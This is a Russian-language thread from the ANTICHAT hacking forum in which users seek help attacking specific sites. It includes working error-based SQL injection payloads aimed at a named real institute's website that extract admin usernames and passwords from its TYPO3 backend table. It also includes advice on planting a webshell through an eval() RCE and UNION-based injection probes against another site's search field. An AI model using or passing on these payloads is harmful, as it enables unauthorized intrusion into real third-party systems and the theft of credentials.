ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.03.2020, 14:21
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Хелп, помогите раскрутить
Код:
Code:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/
|
|
|
01.04.2020, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
5363
Репутация:
12
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Хелп, помогите раскрутить
Код:
Code:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/
/sozialrecht/publikationen/detail/publication/a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(concat_ws(0x3a,username,password)))from(be_us ers)))))='a/
a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(substring(password,20,30)))from(be_users)wher e(username='rtisch')))))='a/
|
|
|
|
03.04.2020, 06:14
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы
|
|
|
|
03.04.2020, 12:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
169390
Репутация:
47
|
|
Сообщение от pinch
pinch said:
↑
Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы Мониторинг трафика требует прямого обращение к сетевому интерфейсу и потому права рута (ну или права группы netdev). Возможно настроить апач/ nginx что-бы они все сливали в лог. Вариант номер 3 это приписать логирование в приложение.
|
|
|
|
12.05.2020, 06:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
3124
Репутация:
2
|
|
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
|
|
|
|
12.05.2020, 12:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
5363
Репутация:
12
|
|
Сообщение от holdik
holdik said:
↑
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю создать файл, данные постом передать
|
|
|
|
13.05.2020, 06:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
14421
Репутация:
3
|
|
Сообщение от holdik
holdik said:
↑
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю Запрещены где ? На хосте или waf-ом ?
|
|
|
|
14.05.2020, 13:21
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896
Репутация:
0
|
|
подскажите как заюзать и достать бд
Код:
Code:
?search=-")+or+1=1+limit+10--+-
выодит 10 записей
Код:
Code:
?search=-")+order+by+1--+-
ошибки нет, но при order by 2 ошибка
Код:
Code:
?search=-")+union+select+1--+-
не выводит "1".
думал там какая то разновидность такого запроса. то есть вероятней всего результат первого запроса (уявимого) передается в WHERE для второго запроса
Код:
Code:
ids = SELECT id FROM users
WHERE group="XXXX" AND (name LIKE "%$GET['search']%" OR email LIKE "%$GET['search']%"
)
SELECT * FROM users WHERE id IN(ids)
сделал запрос типа
Код:
Code:
?search=-")+union+select+217--+-
где 217 это мой id. но результат пустой( |
|
|
|
14.05.2020, 21:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
|
|
|
|
16.05.2020, 20:39
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896
Репутация:
0
|
|
апдейт к предыдущему посту.
Код:
Code:
") union select 1 -- -
ошибка нет, 1 не выводит
Код:
Code:
") or id=2 union select 1 -- -
ошибка |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
